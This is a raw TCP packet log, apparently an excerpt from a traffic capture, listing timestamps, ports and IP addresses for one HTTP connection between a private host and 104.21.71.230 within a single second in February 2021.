Feb 22, 2021 09:14:42.675095081 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.675158024 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.675179005 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.675317049 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.675328016 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.675651073 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.675694942 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.676451921 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.676474094 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.676495075 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.676584005 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.677279949 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.677300930 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.677433014 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.684494019 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.684513092 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.684746027 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.684963942 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.684983969 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.685127974 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.685688972 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.685707092 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.685874939 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.686486959 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.686502934 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.686598063 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.687278986 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.687314987 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.687784910 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.707900047 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.707931042 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.708041906 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.708901882 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.708925009 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.709034920 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.710181952 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.710201979 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.710268021 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.713763952 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.713783979 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.714102030 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.714158058 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.714183092 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.714348078 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.715272903 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.715293884 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.715404034 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.715749979 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.715775013 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.716099024 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.716568947 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.716590881 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.716661930 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.717307091 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.717331886 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.717436075 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.718100071 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.718127012 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.718302011 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.718880892 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.718909025 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.719077110 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.719697952 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.719734907 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.719878912 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.720460892 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.720498085 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.720525980 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.720630884 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.721281052 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.721313000 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.721368074 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.722022057 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.722049952 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.722094059 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.722807884 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.722835064 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.723499060 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.723612070 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.723639011 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.723715067 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.724366903 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.724395037 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.724466085 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.725130081 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.725168943 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.725244999 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.725872040 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.725907087 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.726046085 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.726663113 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.726695061 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.726846933 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.727622986 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.727647066 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.728152037 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.728163958 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.728200912 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.728260040 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.728912115 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.728938103 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.729089975 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.729680061 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.729706049 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.729876995 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.730443954 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.730469942 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.731173992 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.731203079 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.731822014 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.731839895 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.731947899 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.731975079 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.732522011 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.733031988 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.733063936 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.733197927 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.733479023 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.733516932 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.733856916 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.734232903 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.734272003 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.734379053 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.734981060 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.735016108 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.735430002 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.735734940 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.735771894 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.736310005 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.736493111 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.736526966 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.736603022 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.737319946 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.737343073 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.737401962 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.740744114 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.740771055 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.740880966 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.740900993 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.740951061 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.741013050 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.741027117 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.741034985 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.741055012 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.741075993 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.741115093 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.741134882 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.741158009 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.741162062 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.741400003 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.741820097 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.741838932 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.742309093 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.742554903 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.742691040 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.742710114 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.743280888 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.743304014 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.744086981 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.744111061 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.744220972 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.744245052 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.744971037 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.744997978 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.745109081 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.745605946 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.745631933 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.746140957 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.746359110 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.746454000 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.747127056 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.747154951 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.747898102 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.747930050 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.749407053 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.749428034 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.749430895 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.761054039 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.761079073 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.761137962 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.762013912 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.762048006 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.762300968 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.763180017 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.763206959 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.763346910 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.767123938 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.767143011 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.767308950 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.767484903 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.767510891 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.767596006 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.768348932 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.768372059 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.768657923 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.769021988 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.769057035 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.769102097 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.769737005 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.769756079 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.769994974 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.770539999 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.770566940 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.771229982 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.771260977 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.771262884 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.771482944 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.772017002 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.772041082 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.772648096 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.772702932 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.772736073 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.773474932 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.773510933 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.773550034 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.774152040 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.774179935 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.774446011 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.774465084 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.774915934 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.774933100 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.775576115 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.775603056 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.775641918 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.775651932 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.776271105 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.776288986 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.776470900 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.776954889 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.776973963 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.777021885 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.777640104 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.777658939 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.777837992 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.778505087 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.778522968 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.778630018 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.778971910 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.778995037 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.779205084 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.779608965 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.779632092 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.779649019 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.779737949 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.779753923 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.780566931 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.781002998 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.781016111 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.781028986 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.781416893 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.781996965 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.782012939 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.782031059 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.782092094 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.782958031 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.782978058 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.782994986 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.783087969 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.783102989 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.783785105 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.783801079 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.783821106 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.783907890 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.784527063 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.784545898 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.784563065 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.784596920 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.784643888 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.785521030 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.785542011 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.785558939 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.786056995 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.786429882 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.786448956 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.786465883 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.786519051 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.786555052 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.787075043 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.787103891 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.787127018 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.787875891 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.787898064 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.787914991 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.788022041 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.788038969 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.788743973 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.788764000 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.788785934 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.788867950 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.789624929 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.789649010 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.789664984 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.789716959 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.789798975 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.790457010 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.790476084 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.790494919 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.790553093 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.791356087 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.791373014 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.791388988 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.792032003 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.792063951 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.792087078 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.792654037 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.792671919 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.792675972 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.792845011 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.792869091 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.792891026 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.792927027 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.793113947 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.793716908 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.793742895 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.793768883 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.793823957 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.794368029 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.794395924 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.794420004 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.795173883 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.795203924 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.795228958 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.795418978 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.795433044 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.795435905 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.795969009 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.795993090 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.796010971 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.796088934 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.796097040 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.796627045 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.796650887 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.796674013 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.796693087 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.796840906 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.796854019 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:42.797581911 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.797611952 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.797638893 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:42.797657967 CET	80	49767	104.21.71.230	192.168.2.4
